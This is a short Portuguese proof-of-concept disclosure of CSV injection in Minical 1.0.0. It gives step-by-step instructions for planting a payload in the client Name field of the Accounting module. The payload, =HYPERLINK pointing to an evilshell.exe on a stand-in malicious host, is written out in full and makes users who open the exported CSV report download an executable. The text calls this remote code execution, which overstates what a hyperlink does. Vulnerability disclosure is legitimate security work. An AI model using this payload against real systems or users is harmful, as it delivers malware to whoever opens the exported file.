
Prova de conceito demonstrando vulnerabilidade de injeção de CSV no Minical 1.0.0 através de payload HYPERLINK malicioso no campo nome do cliente, levando à execução remota de código quando o relatório é baixado.
Minical 1.0.0 é vulnerável a Injeção de CSV.
Fornecedor: https://github.com/minical/minical
Aplicação de Demonstração: https://demo.minical.io/
Passo 1: Navegue até o módulo de Contabilidade e clique em Criar Novo Cliente.

Passo 2: Insira o payload no campo Nome e clique em Criar.
Payload: =HYPERLINK("<https://malicious.com/evilshell.exe>","ClickHere")


Passo 3: Clique em Baixar Relatório CSV e observe o payload sendo renderizado.
